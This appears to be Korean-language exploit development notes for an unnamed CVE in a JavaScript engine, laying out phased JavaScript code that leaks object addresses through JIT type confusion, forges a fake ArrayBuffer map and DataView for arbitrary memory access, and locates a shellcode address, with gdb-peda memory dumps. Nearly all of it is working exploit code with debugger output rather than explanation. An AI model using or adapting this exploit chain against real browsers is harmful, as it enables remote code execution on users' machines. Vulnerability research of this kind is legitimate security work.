CVE


ab_map_obj 생성

phase 1 : set ab_map_obj[]

ap.proto를 구해서 ab_map_obj에 넣는다

        //alert_log(addr);
        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        alert_log("[.] 1.ab_prot_addr: 0x" + ab_proto_addr.toString(16));
        //sleep(60*1000);
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
0x26e976fd3f78:    0xdaba0000daba0000    0x000900c01f000008
0x26e976fd3f88:    0x00000000082003ff    0x000026e976f95889
0x26e976fd3f98:    0x000026e976f95819    0x0000000000000000

phase 2 : ab_map_obj의 주소 찾기

gdb에서 0x000900c01f000008 값이 찾아져야 함
change_to_float(ab_map_obj,ab_map_obj_float);
ab_map_obj_addr = read_obj_addr2(ab_map_obj_float) + 0x40

gdb-peda$ find 0x000900c01f000008
Searching for '0x000900c01f000008' in: None ranges
Found 1 results, display max 1 items:
mapped : 0x26e976fd3f80 --> 0x900c01f000008

phase 3 : fake_ab의 주소 찾기

change_to_float(fake_ab,fake_ab_float);
fake_ab_float_addr = read_obj_addr3(fake_ab_float) + 0x40;

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]

phase 4 : fake_arraybuffer 오브젝트 만들기

fake_arraybuffer = double_arr42[1];
fake_dv = new DataView(fake_arraybuffer,0,0x4000);

        fake_ab_float_addr_f = d2u(fake_ab_float_addr / 0x100000000,fake_ab_float_addr & 0xffffffff).toString();
        function carry_me_plz_fake(arr){
                for(var i = 0;i < arr.length;i++){
                        var o = arr[i];
                        ttt = o[0];
                }
        }
        eval('function sorry_fake(){1 + valueOf4;double_arr42[0] = 1.1;carry_me_plz_fake(array4);double_arr42[1] = '+fake_ab_float_addr_f+';}')
        for(var i = 0;i < 0x1000;i++){
                carry_me_plz_fake(array3);
        }
        for(var i = 0;i < 0x1000;i++){
                sorry_fake();
        }
        flag = 1;
        sorry_fake();
        //sleep(60)

        fake_arraybuffer = double_arr42[1];

phase 5 : shellcode 주소 찾기

        function read_obj_addr5(object){
                function carry_me_plz(arr,obj){
                        for(var i = 0;i < arr.length;i++){
                                var o = arr[i];
                                o[0] = obj;
                        }
                }
                function sorry(){
                        1 + valueOf5;
                        double_arr52[0] = 1.1;
                        carry_me_plz(array5,object);
                        return double_arr52[0];
                }
                for(var i = 0;i < 0x1000;i++){
                        carry_me_plz(array5,object);
                }
                for(var i = 0;i < 0x1000;i++){
                        sorry();
                }
                flag = 1;
                re = u2d(sorry());
                return re;
        }